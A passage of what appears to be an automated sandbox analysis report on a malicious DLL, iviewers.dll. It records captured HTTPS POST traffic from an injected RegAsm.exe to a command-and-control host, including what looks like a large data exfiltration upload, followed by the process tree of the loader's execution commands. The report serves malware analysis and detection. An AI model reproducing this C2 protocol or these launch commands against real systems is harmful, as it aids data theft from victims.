                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1671&min_rtt=1656&rtt_var=652&sent=16&recv=27&lost=0&retrans=0&sent_bytes=2839&recv_bytes=21143&delivery_rate=1640449&cwnd=213&unsent_bytes=0&cid=e5a9d65905202ce8&ts=978&x=0"
                                                          2024-12-24 01:18:38 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                          Data Ascii: fok 8.46.123.189
                                                          2024-12-24 01:18:38 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                          Data Ascii: 0


                                                          Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
                                                          14         | 192.168.2.8 | 49727       | 172.67.195.241 | 443              | 4132 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                          Timestamp               | Bytes transferred | Direction | Data
                                                          2024-12-24 01:18:38 UTC | 264               | OUT       | POST /api HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                          Content-Length: 84
                                                          Host: volcanoyev.click
                                                          2024-12-24 01:18:38 UTC | 84 | OUT | Data Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 56 43 36 44 66 6d 2d 2d 4c 6f 61 64 65 72 32 26 6a 3d 26 68 77 69 64 3d 41 44 31 38 34 45 42 43 44 36 37 39 44 44 38 36 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45
                                                          Data Ascii: act=get_message&ver=4.0&lid=VC6Dfm--Loader2&j=&hwid=AD184EBCD679DD86AC8923850305D13E
                                                          2024-12-24 01:18:39 UTC | 1121 | IN | HTTP/1.1 200 OK
                                                          Date: Tue, 24 Dec 2024 01:18:39 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          Set-Cookie: PHPSESSID=v1v1evca1pt0710o6bhuuuhhbq; expires=Fri, 18 Apr 2025 19:05:18 GMT; Max-Age=9999999; path=/
                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                          Pragma: no-cache
                                                          X-Frame-Options: DENY
                                                          X-Content-Type-Options: nosniff
                                                          X-XSS-Protection: 1; mode=block
                                                          cf-cache-status: DYNAMIC
                                                          vary: accept-encoding
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WKIb86fU614mEBzT1qUhsMi6mWcnXMC9j4iBZvHOLnSS27x2q2gZoOZu0O4sJrmzaPZS8IPmLEtnaoG1lW4Cy%2B3RalGZ6njk7AUxGmdnr3XajY8wYJxnAvqtAH%2B2jk0%2BMDwT"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8f6cc2371fec4295-EWR
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1742&min_rtt=1705&rtt_var=714&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2839&recv_bytes=984&delivery_rate=1456359&cwnd=252&unsent_bytes=0&cid=1a6104c6b01512f2&ts=785&x=0"
                                                          2024-12-24 01:18:39 UTC | 54 | IN | Data Raw: 33 30 0d 0a 71 71 77 58 74 45 38 79 43 4b 53 68 5a 57 52 4d 77 77 30 78 59 50 53 2f 50 2b 6c 55 66 36 30 73 50 4b 34 7a 31 54 50 6e 47 7a 6a 78 38 51 3d 3d 0d 0a
                                                          Data Ascii: 30qqwXtE8yCKShZWRMww0xYPS/P+lUf60sPK4z1TPnGzjx8Q==
                                                          2024-12-24 01:18:39 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                          Data Ascii: 0


                                                          Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
                                                          15         | 192.168.2.8 | 49728       | 172.67.195.241 | 443              | 4352 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                          Timestamp               | Bytes transferred | Direction | Data
                                                          2024-12-24 01:18:39 UTC | 275               | OUT       | POST /api HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Content-Type: multipart/form-data; boundary=K8JYRBZ00Y8F
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                          Content-Length: 1211
                                                          Host: volcanoyev.click
                                                          2024-12-24 01:18:39 UTC1211OUTData Raw: 2d 2d 4b 38 4a 59 52 42 5a 30 30 59 38 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 44 31 38 34 45 42 43 44 36 37 39 44 44 38 36 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 4b 38 4a 59 52 42 5a 30 30 59 38 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 4b 38 4a 59 52 42 5a 30 30 59 38 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 56 43 36 44 66 6d 2d 2d 4c 6f 61 64 65 72 32 0d 0a 2d 2d 4b 38 4a 59 52 42 5a 30 30 59 38 46
                                                          Data Ascii: --K8JYRBZ00Y8FContent-Disposition: form-data; name="hwid"AD184EBCD679DD86AC8923850305D13E--K8JYRBZ00Y8FContent-Disposition: form-data; name="pid"1--K8JYRBZ00Y8FContent-Disposition: form-data; name="lid"VC6Dfm--Loader2--K8JYRBZ00Y8F
                                                          2024-12-24 01:18:40 UTC | 1124 | IN | HTTP/1.1 200 OK
                                                          Date: Tue, 24 Dec 2024 01:18:40 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          Set-Cookie: PHPSESSID=j0dagrthg29eehbunij6q3lboh; expires=Fri, 18 Apr 2025 19:05:19 GMT; Max-Age=9999999; path=/
                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                          Pragma: no-cache
                                                          X-Frame-Options: DENY
                                                          X-Content-Type-Options: nosniff
                                                          X-XSS-Protection: 1; mode=block
                                                          cf-cache-status: DYNAMIC
                                                          vary: accept-encoding
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AsAXNV0ISixnNVkAZ76PQLC0ZjJWe%2BMG1fMmwTz5s4ggLtis8tUksPkVd8MiWkkM%2FBzXl5gE4oGqL%2BDaw6Z9QliH3bx8JwwsfsqqH1vdejEil63Rhve10aZfG6R%2BkmGmz8px"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8f6cc23b68d00f87-EWR
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1446&min_rtt=1443&rtt_var=547&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2839&recv_bytes=2122&delivery_rate=1990456&cwnd=229&unsent_bytes=0&cid=6ca6170b8c662f5b&ts=773&x=0"
                                                          2024-12-24 01:18:40 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                          Data Ascii: fok 8.46.123.189
                                                          2024-12-24 01:18:40 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                          Data Ascii: 0


                                                          Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
                                                          16         | 192.168.2.8 | 49729       | 172.67.195.241 | 443              | 4352 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                          Timestamp               | Bytes transferred | Direction | Data
                                                          2024-12-24 01:18:42 UTC | 282               | OUT       | POST /api HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Content-Type: multipart/form-data; boundary=6JZILERQMQWI51E14
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                          Content-Length: 589118
                                                          Host: volcanoyev.click
                                                          2024-12-24 01:18:42 UTC15331OUTData Raw: 2d 2d 36 4a 5a 49 4c 45 52 51 4d 51 57 49 35 31 45 31 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 44 31 38 34 45 42 43 44 36 37 39 44 44 38 36 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 36 4a 5a 49 4c 45 52 51 4d 51 57 49 35 31 45 31 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 36 4a 5a 49 4c 45 52 51 4d 51 57 49 35 31 45 31 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 56 43 36 44 66 6d 2d 2d 4c 6f 61 64 65 72 32 0d
                                                          Data Ascii: --6JZILERQMQWI51E14Content-Disposition: form-data; name="hwid"AD184EBCD679DD86AC8923850305D13E--6JZILERQMQWI51E14Content-Disposition: form-data; name="pid"1--6JZILERQMQWI51E14Content-Disposition: form-data; name="lid"VC6Dfm--Loader2
                                                          2024-12-24 01:18:42 UTC15331OUTData Raw: ce 43 e8 a8 73 8d 46 a0 ad 4d 39 83 aa 35 25 e9 54 76 30 0d a8 28 f2 08 8a c9 4d 2f 2f 49 b7 22 a9 9e b5 88 60 ef 4e 2f 36 3e 7c a8 88 72 7f ef ee db 17 49 97 6b 4f d0 92 61 fe 62 81 2e a5 7f bd 5f 9c a5 98 06 aa ff f6 50 68 18 72 3e b6 d8 39 e2 fa 34 da 37 d1 9d 1e be ae 5d d2 c1 5a 8c 07 ba 19 a3 b9 cb 1c 02 0e 5a 21 a0 5c 05 29 51 26 fa ee 43 8f 3c f4 5a 4a bb 6b cd f0 99 28 b2 7d 57 ce 92 03 8a 3c 8f ea 8e 57 a6 39 8a f6 25 69 f1 b8 16 9a 8c 58 14 c7 b3 be 4e 8f 8b 7b e4 28 69 c5 06 c0 be 3e a8 c6 0d b3 6c bc ea 40 7e 6a aa 1a 67 e5 c2 70 38 e6 2e f7 ae 9e d3 69 7e 28 ee fe 79 73 77 d4 ad a4 56 49 74 2f 41 65 28 12 a9 ca 5c 83 55 37 0b 40 f2 ff be f0 80 f1 cd 4c 4c 9d 6f 27 6f 17 23 cb 30 08 ca ae e4 0c 0d dc 65 34 55 64 1e c4 c0 8b b5 a5 3d b5 d4 05
                                                          Data Ascii: CsFM95%Tv0(M//I"`N/6>|rIkOab._Phr>947]ZZ!\)Q&C<ZJk(}W<W9%iXN{(i>l@~jgp8.i~(yswVIt/Ae(\U7@LLo'o#0e4Ud=
                                                          2024-12-24 01:18:42 UTC15331OUTData Raw: 23 ce 55 0b 52 65 09 34 aa 4a 47 79 72 5f d4 a4 14 60 b5 8e 87 8c dd 38 35 0d a1 c0 51 46 7e 11 06 ce 91 6e 36 d1 4b 62 7f 1b 6b 4d 53 6e c8 52 5a 26 f1 be 90 42 72 aa ea f5 20 3e 6f fd 07 c6 fa f3 28 44 2b fb 5c cf 90 35 b6 e7 16 ea 9f 69 29 1b c9 8f d3 30 d1 aa c0 7c 1d 6f 96 13 80 b1 c3 e7 78 61 7b ab a8 92 bf 90 fe 7a c6 50 d6 fd a5 ec eb 65 a4 84 2e cb 0d 45 70 ff d9 3c 52 ba 01 66 01 e4 7b aa 55 0e 42 12 a0 79 dc fb 25 27 dd 0f 9d c6 c7 35 88 83 79 c5 d5 f8 1e 11 c2 57 41 71 bb 78 9e a9 d5 49 52 3a 20 63 63 11 7d 5e 43 1a 59 c0 f6 f5 fb 84 c5 bd a7 ba 59 ed c3 e8 ae 3b e2 de dc db f4 6d 57 88 90 2c 02 1e 06 86 1f b3 c1 34 ba 51 60 a3 78 7e a3 da c2 0e c3 46 7d 25 cc 98 ce 09 ad 78 7d 85 db cb a3 93 c9 ba 23 81 0f 06 03 cf df fd 73 69 d7 96 7b 46 2b
                                                          Data Ascii: #URe4JGyr_`85QF~n6KbkMSnRZ&Br >o(D+\5i)0|oxa{zPe.Ep<Rf{UBy%'5yWAqxIR: cc}^CYY;mW,4Q`x~F}%x}#si{F+
                                                          2024-12-24 01:18:42 UTC15331OUTData Raw: 6d 84 b4 ee 28 ab 89 57 55 35 82 a4 89 26 ae b7 bb 7a af b8 5a a7 3d ca cc 5b f5 9a 1a 18 3e 5f fa 0c ae a2 9b 07 66 8d 93 39 c6 de 02 c9 23 b6 d5 0b a7 62 d8 fb 77 42 c3 f6 70 55 61 21 2e 0a 8a 19 8f 74 81 4b 3b 1c b0 93 2f 78 7d 8f 66 7e 21 35 fe d6 06 44 18 db 5d 12 bc c1 4c 0e 06 1c 48 38 a1 fb 47 e8 9f d1 35 df 09 10 c7 71 7a e5 0b 44 01 5c f7 fd 09 45 18 18 f9 6c 0a 88 bd 3e a6 a7 83 be c0 c8 b1 67 26 02 d6 96 b2 82 4b f7 8f fe 13 52 0c ec cf 4f 17 0f 66 1d c9 52 e8 d6 00 c7 1f 36 af 04 94 ad ca 67 95 1d 21 0e d4 ce 2c 4d 7c d1 07 58 4a 3d f7 05 4f b3 6b 8d f9 18 ab 71 a9 f1 77 59 7b 4a c3 8b 7c cb eb 10 28 a5 95 c8 9f e6 64 a2 a9 63 a3 a1 ef 55 12 4e 37 37 91 18 5d c1 1f 61 c4 da 00 a7 c4 15 87 36 45 76 2c 8c 3a 82 0c 0f 85 26 08 16 42 b5 ee 66 d4
                                                          Data Ascii: m(WU5&zZ=[>_f9#bwBpUa!.tK;/x}f~!5D]LH8G5qzD\El>g&KROfR6g!,M|XJ=OkqwY{J|(dcUN77]a6Ev,:&Bf
                                                          2024-12-24 01:18:42 UTC15331OUTData Raw: 97 81 39 b0 c0 b9 4d 54 1c 42 45 16 e3 8e 87 2b ba 34 df 8f 5f a2 b6 e3 0c 2f 80 ef 4b 59 84 8e ba e3 f4 4b ad e1 81 76 68 cc db 2f fd b6 c3 24 7f e3 8c 36 de 54 59 d0 a7 74 34 f5 14 d0 28 cd 52 00 05 99 2f 42 23 51 2f d3 72 58 4c af aa 6c dc db 37 10 56 86 1d 5c e2 a9 9c 88 74 9b 6f 6b e6 ef dd b8 11 3c e1 ba 4b b2 ef 98 41 81 d9 01 dc 6b 05 02 ee 1d b6 c3 44 17 01 60 2d db bc c0 ec 8f 42 24 9c 9c 46 ad f5 04 b4 0b 88 88 1b 19 5e 7d 2b 34 2b 40 b4 4d 2a b0 06 05 f6 ae 44 a5 8c ab 64 aa 21 ae 4f 05 e4 1e 91 29 d8 05 ec 4e a4 11 4c e1 54 13 32 21 bb 17 e3 55 f3 83 b0 da 1d a7 48 14 17 e4 e3 bb 84 22 0f 47 50 9d a6 b8 26 3f c9 d2 e2 b5 c4 7d a1 65 06 18 5d ff 5b 6f 8e 60 ed b8 75 fc 26 97 41 4a 96 c9 4f f0 16 83 e0 05 7e 3c c4 67 41 64 3e 36 40 a8 61 d7 cf
                                                          Data Ascii: 9MTBE+4_/KYKvh/$6TYt4(R/B#Q/rXLl7V\tok<KAkD`-B$F^}+4+@M*Dd!O)NLT2!UH"GP&?}e][o`u&AJO~<gAd>6@a
                                                          2024-12-24 01:18:42 UTC15331OUTData Raw: ce bb 49 45 e8 3a b7 d4 1a 7a e1 56 4f d1 50 04 5f f9 3c 93 d8 18 2d 13 cf 13 a6 d3 29 35 27 f7 fb 4e f6 2a 16 bf 2a 12 9c f2 41 73 8d 71 7d 2b 09 e0 ed 8d f7 dd a7 95 bb 5b 4e 05 a7 00 90 20 2b 33 76 71 36 ad 18 df 17 94 ed 6a 35 c6 73 48 ab c9 2f 80 a5 c4 27 f3 70 5f 81 16 e7 a6 4e 32 ca c0 0b 94 6e 37 ba ce 9e 3b c3 6c 58 3b 68 e7 79 d7 18 bf 39 fe be e8 43 75 27 e4 8e 68 1e f4 f0 56 74 7b e2 7d 32 9d 84 9f cf 5f 1d ae a8 74 6d 35 39 16 4e 1d f7 5b d9 fc fb f8 c1 b8 0a d9 0c 0e b8 cf 60 a6 d7 a7 af 67 56 d8 69 80 a5 47 bc 20 7f b0 5b 5b 7d ad 96 bf 4b 77 7e ad f9 95 a0 79 e8 60 cf 64 33 35 60 f3 37 1b 4d cf 1f d4 c4 42 8c c4 8b cc 20 f3 ed bd 85 f7 f2 87 36 2a c6 a3 b5 a9 c2 55 6b cc e4 54 5e 02 98 af 32 57 8b 1f 1c f2 7f 80 83 9b b1 cc 5d 80 21 fe d2
                                                          Data Ascii: IE:zVOP_<-)5'N**Asq}+[N +3vq6j5sH/'p_N2n7;lX;hy9Cu'hVt{}2_tm59N[`gViG [[}Kw~y`d35`7MB 6*UkT^2W]!
                                                          2024-12-24 01:18:42 UTC15331OUTData Raw: dc 76 3a f6 58 15 fc 15 96 b1 47 22 9a 7d e5 2b 59 ae 8f 56 7f c4 d0 c0 3b 64 af fc f4 8f be c9 c3 28 d8 85 69 fe b8 04 cc 59 6e 37 08 75 3a 2b 4b 44 bc e9 82 ed e6 3d ed 00 8c 1a 57 4f 08 80 d4 e8 f9 bb 1a d2 40 4c 17 98 82 d6 72 e0 21 6e 34 fc 88 5e bd b7 ef 22 5d 0c 04 a2 38 fd 61 74 14 90 b8 83 1b fb c1 b3 ec 07 61 d9 bf 20 86 08 fb 59 7c fe fe 85 a4 f1 ed 23 64 10 bd 32 3b 1f 0b 97 cb dd 40 d9 01 77 d9 30 31 60 97 9d 55 d0 da 8c bf 14 19 5f 8e f5 3a f9 b4 cd 51 7f ce 72 a4 3a e6 e6 24 4f 87 24 2c 25 b4 47 e4 4f 6f 0a 53 83 b0 59 b2 dd a6 33 43 4e 14 15 09 87 7b a2 cf 03 3c c4 3e 2d 85 e5 22 18 00 da d0 61 54 ee 41 8a e8 ab 6a 3f cb 88 5d 23 5c 1d 4f 9c 63 c3 31 d1 3c 02 77 ff 7c 37 fa a3 db 8c fd c3 47 ee 9b f6 48 45 22 e6 59 2e 9e 3b 39 2d 4f 22 10
                                                          Data Ascii: v:XG"}+YV;d(iYn7u:+KD=WO@Lr!n4^"]8ata Y|#d2;@w01`U_:Qr:$O$,%GOoSY3CN{<>-"aTAj?]#\Oc1<w|7GHE"Y.;9-O"
                                                          2024-12-24 01:18:42 UTC15331OUTData Raw: 05 51 a6 5d e5 53 1e 9f 2e a1 6d bc 6f a8 fb 44 73 9e 29 2f 9d de 25 4c 66 38 44 06 a3 36 c1 c6 b5 a5 ce 8d 57 ef b9 b7 56 c6 c1 b4 28 b0 bb b0 bd 53 19 f1 07 ff 43 c3 67 f3 01 c1 27 9f 0f bc df 83 46 dc 13 90 32 09 0a 64 f1 d3 dc 20 ed 42 0c f5 15 04 57 ca a9 81 ee 84 33 a0 20 b5 57 13 0a 3a a4 58 20 0a fe c8 f5 c9 9d f4 71 1f 76 de 0f 1a 37 b7 fb a7 f5 e2 53 ce f0 cc bf b3 9b 59 80 ad 2e d2 df e3 b9 b0 d3 57 97 6d 32 9d 79 50 bd d9 ea 35 e9 a2 b2 51 20 9c 10 29 9b 1a 79 8f 6b 47 c7 d1 4f ce fb 26 25 f8 f2 0c 79 57 fc df 12 11 8f 9f 7e b6 f8 a9 00 f9 49 64 2b ff 31 e2 31 70 0c 51 89 4e 7f 33 42 79 7f d0 0e ee 94 61 c8 ce ee 40 5d 3b 1d 8f 22 f1 68 a0 2e 88 d4 8e 59 fb a1 cf cd 00 a2 8b 3c 42 39 d7 74 d4 08 5d 31 70 29 f9 f5 93 a7 ac ac dd 0a 93 7c 98 2d
                                                          Data Ascii: Q]S.moDs)/%Lf8D6WV(SCg'F2d BW3 W:X qv7SY.Wm2yP5Q )ykGO&%yW~Id+11pQN3Bya@];"h.Y<B9t]1p)|-
                                                          2024-12-24 01:18:42 UTC15331OUTData Raw: ae 77 63 14 cb b5 a3 4b e3 d1 0a 52 8b bf dc c0 56 fb 69 98 d4 3e b8 14 6e 58 28 e0 71 6f 21 16 30 b1 43 df 5e 94 29 6b 24 5e 5f 2d a0 24 c0 54 6b a3 13 61 3a 7d 68 45 8d 01 68 19 77 68 02 a0 d9 49 6e 6c 5d fe ee bd ee d0 a4 e5 f1 b8 fc 1c bb 94 2b 9f 8b 97 05 43 5a 27 47 c3 4f 2e 3c 7e b7 1b 51 d6 52 7f 69 f4 f3 ad 56 c1 97 a8 cb 05 37 17 56 17 c9 44 e4 c2 ff 1e b5 2c 43 2e 3a f7 6d 31 9a e5 8e 8c 7d 27 7c be fc 39 9b a7 f5 66 34 27 e1 3b 7b 63 34 91 b6 a2 c8 d8 c1 52 f0 20 0e 8f 4d ce 52 82 3f a8 30 d8 bf b8 71 e8 b4 28 38 55 4d cc 3c 73 cf 84 e7 29 c7 fa a1 29 2f 38 99 7a 30 2f 87 6f a1 6d d1 cd 91 fa 66 ab 24 7a 7e f5 15 81 37 59 fc c6 b7 eb 30 33 5a dd 63 cf ab 91 f7 55 b6 88 ec c3 76 1a dc 5f d6 61 54 55 f0 41 a7 4b 0f 89 c4 c5 aa 55 73 4d d8 31 6d
                                                          Data Ascii: wcKRVi>nX(qo!0C^)k$^_-$Tka:}hEhwhInl]+CZ'GO.<~QRiV7VD,C.:m1}'|9f4';{c4R MR?0q(8UM<s))/8z0/omf$z~7Y03ZcUv_aTUAKUsM1m
                                                          2024-12-24 01:18:42 UTC15331OUTData Raw: e6 26 33 53 bf 1e 70 f4 3d bd c6 29 0d 5b 4d 02 4d 8b 37 c5 06 da 5f c2 46 40 1b 81 18 96 c1 51 f4 ed ef a8 74 de 58 d8 af a6 f4 44 21 1f 98 c1 41 65 54 3b 8a fd 38 1b ef 77 cd bc fe e2 b6 ff c9 0b c1 e7 af b4 d9 ab 69 2d be af 9a 85 2e d9 9d c5 1a a5 1b 14 9e 2b 15 7e 30 55 b6 6a f0 56 d3 d6 56 9c 25 ab b9 8f a9 94 ee 7a ed 94 76 9b 94 c3 79 29 3e 53 52 60 d0 72 5b 62 8c c3 87 3d d1 74 9f e5 5d e1 41 ef 16 b6 20 ec 55 76 8c 16 cd 58 f4 7e 6d d1 d2 ab 74 f3 63 43 83 e8 d6 69 39 c4 b9 48 ea 2a ef c0 8a 14 65 1c 47 4b 35 2e da 2c ce dd 28 f8 16 90 42 d1 e7 dc 7f d1 ec 91 2f f7 fc 7d ca d6 6d 76 ce e8 87 72 51 ae d7 ed 72 9b 3a 69 eb b3 36 66 ef e9 37 4b e7 6f 37 bf 7b f5 36 74 fa 51 4e fb 4a 88 e0 22 b3 2d 6b bf 65 ae 94 42 c5 15 21 72 b9 8d 38 f7 0d e2 c8
                                                          Data Ascii: &3Sp=)[MM7_F@QtXD!AeT;8wi-.+~0UjVV%zvy)>SR`r[b=t]A UvX~mtcCi9H*eGK5.,(B/}mvrQr:i6f7Ko7{6tQNJ"-keB!r8
                                                          2024-12-24 01:18:44 UTC1129INHTTP/1.1 200 OK
                                                          Date: Tue, 24 Dec 2024 01:18:44 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          Set-Cookie: PHPSESSID=u7l8hfgqbu3b3g86hlspjulogf; expires=Fri, 18 Apr 2025 19:05:23 GMT; Max-Age=9999999; path=/
                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                          Pragma: no-cache
                                                          X-Frame-Options: DENY
                                                          X-Content-Type-Options: nosniff
                                                          X-XSS-Protection: 1; mode=block
                                                          cf-cache-status: DYNAMIC
                                                          vary: accept-encoding
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hKPcyz29cvgA7gmWfVc2KN1c3A1b6wSICFgMrbqLNY3TugSYH2h5ntgA80UajXayrkFAHEEeeWQqZMf4%2BsA19rUvz2hM%2FEXiK96OQ8XmufmLxnU0DzOV5Pyf%2Fnab35h1cR8M"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8f6cc249ba5b1881-EWR
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1713&min_rtt=1590&rtt_var=684&sent=335&recv=614&lost=0&retrans=0&sent_bytes=2839&recv_bytes=591708&delivery_rate=1836477&cwnd=238&unsent_bytes=0&cid=8fa585cdb07294d3&ts=2277&x=0"



                                                          Target ID:0
                                                          Start time:20:18:02
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\System32\loaddll32.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:loaddll32.exe "C:\Users\user\Desktop\iviewers.dll"
                                                          Imagebase:0xfc0000
                                                          File size:126'464 bytes
                                                          MD5 hash:51E6071F9CBA48E79F10C84515AAE618
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:1
                                                          Start time:20:18:02
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff6ee680000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:2
                                                          Start time:20:18:02
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:cmd.exe /C rundll32.exe "C:\Users\user\Desktop\iviewers.dll",#1
                                                          Imagebase:0xa40000
                                                          File size:236'544 bytes
                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:4
                                                          Start time:20:18:02
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\SysWOW64\regsvr32.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:regsvr32.exe /s C:\Users\user\Desktop\iviewers.dll
                                                          Imagebase:0xc00000
                                                          File size:20'992 bytes
                                                          MD5 hash:878E47C8656E53AE8A8A21E927C6F7E0
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:5
                                                          Start time:20:18:02
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\SysWOW64\rundll32.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:rundll32.exe C:\Users\user\Desktop\iviewers.dll,DllRegisterServer
                                                          Imagebase:0x490000
                                                          File size:61'440 bytes
                                                          MD5 hash:889B99C52A60DD49227C5E485A016679
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:6
                                                          Start time:20:18:02
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\SysWOW64\rundll32.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:rundll32.exe "C:\Users\user\Desktop\iviewers.dll",#1
                                                          Imagebase:0x490000
                                                          File size:61'440 bytes
                                                          MD5 hash:889B99C52A60DD49227C5E485A016679
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:7
                                                          Start time:20:18:08
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\snjgawjs\snjgawjs.cmdline"
                                                          Imagebase:0xb10000
                                                          File size:2'141'552 bytes
                                                          MD5 hash:EB80BB1CA9B9C7F516FF69AFCFD75B7D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:moderate
                                                          Has exited:true

                                                          Target ID:8
                                                          Start time:20:18:08
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
